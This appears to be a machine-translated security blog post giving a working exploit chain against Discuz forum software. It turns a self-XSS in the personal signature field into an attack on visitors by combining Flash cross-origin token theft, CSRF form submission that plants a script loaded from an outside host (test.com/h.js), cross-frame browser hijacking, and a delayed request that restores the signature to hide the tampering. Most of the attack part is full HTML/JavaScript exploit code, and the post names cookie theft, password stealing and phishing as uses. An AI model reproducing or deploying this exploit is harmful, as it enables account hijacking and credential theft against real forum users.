Discuz xss 0-day exploitation method

RAyh4c Black Box

Let's talk about the idea and specific code of using discuz xss last year.

A persistent XSS vulnerability exists in the personal signature settings of all versions of discuz x Series and below: for example, when modifying a personal signature, submit </textarea> <script> alert (1) </script> to execute the script.

This XSS application scenario is special. It can be triggered only on the Personal Data settings page, that is, only you can see your own XSS ~ =!

In the past, it was almost impossible for such a chicken rib to be used in penetration, but we can turn it into a baby by using other methods. Next I will discuss the attack process:

The attacker clicks the link in the post to open our attack webpage to trigger the attack ~

1. Use FLASH cross-origin requests to obtain formhash and the individual signature of the attacker.

All DISCUZ programs place a crossdomain. xml in the root directory, allowing any website FLASH to initiate a request to obtain the page content, so we can easily obtain formhash.

 

2. Construct an automatic submission form, IFRAME, and then modify the personal signature to add the XSS code.

To succeed in CSRF, formhash is required to construct a complete parameter submission.

 

3. the attack code takes effect. The attacker's browser is hijacked in reverse mode, and a script is injected into the post page to run the code. Then, the attacker can take advantage of phishing, password stealing, COOKIE Stealing, or anything.

 

 

4. finally, the attacker's signature will be restored because the content in the personal signature will be displayed in the post and the script cannot be executed. It is easy to detect exceptions, so the attacker's signature must be restored.

 

Attack code:

With flxhr, this library can facilitate FLASH cross-origin access to webpage content and interact with javascript. Of course, there are other powerful functions.Http://www.flensed.com/code/releases/flXHR-1.0.5.zip

Using luoluo's jspayloadlib, written by luoluo two years ago, it facilitates the xss and csrf attack libraries, and is more suitable for practical use.Http://jspayloadlib.googlecode.com/svn/trunk/src/org/ph4nt0m/net/formSendData.js

 

<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN ""Http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns ="Http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> </title>
<Script language = "Javascript" type = "text/javascript" src = "flXHR. js"> </script>
<Script language = "Javascript" type = "text/javascript" src = "formSendData. js"> </script>

<Script language = "Javascript" type = "text/javascript">
<! --
Crossdomain_xml ="Http://xxx.qq.com/discuz/Discuz_7.2_ SC _GBK/crossdomain.xml"// Crossdomain. xml address
Attack_url ="Http://xxx.qq.com/discuz/Discuz_7.2_ SC _GBK/memcp.php? Action = profile & typeid = 2"// Personal Data settings page address
 
Var flproxy = new flensed. flXHR ({autoUpdatePlayer: true, instanceId: "myproxy1", xmlResponseText: false, onerror: handleError, handle: handleLoading, loadPolicyURL: crossdomain_xml, noCacheHeader: false });

Function doit (){
Flproxy. open ("GET", Attack_url );
Var request = "";
Flproxy. send (request );
}
 
Function handleLoading (XHRobj ){
If (XHRobj. readyState = 4 ){
// Alert (XHRobj. responseText)
HTMLcode = XHRobj. responseText;
Hash_start = HTMLcode. search (/formhash /);
Signature_re =/textarea .*? Signaturemessage. *?> (. *) </Textarea/. exec (HTMLcode); // obtain the personal signature content
Scode = RegExp. $1;

If (hash_start>-1 ){

Formhash = HTMLcode. substr (hash_start + 9, 8); // formhash is an 8-character string plus a number, and the next 8 bytes of the 9-character string "formhash =" are formhash.
// Alert (formhash );

FormSendData ("post", Attack_url ,{
"Formhash": formhash,
"Signaturenew": "</textarea> <script src = http://test.com/h.js> </script> ",
"Editsubmit": "1"
}, 1000); // Add the browser hijacking code.

FormSendData ("post", Attack_url ,{
"Formhash": formhash,
"Signaturenew": scode,
"Editsubmit": "1"
}, 5000); // a five-second delay CSRF restores a personal signature

}
}
}
Function handleError (errObj ){}
-->
</Script>
</Head>
<Body>

<Input type = "button" value = "Click Me" onClick = "doit ();"/>
</Body>

</Html>

PS:

Content of h.js

Window. parent. opener. location = "javascript: alert (I had been hijacking your browser !); Void (0 )"

Many people asked how to reverse hijack the injection script to the post page. Previous documents have been written.Http://secinn.appspot.com/pstzine/read? Issue = 3 & articleid = 5Because the IFRAME profile setting page and post page are the same source page, you can use window. parent. opener to reverse inject JS to the same source post page through the cross-framework.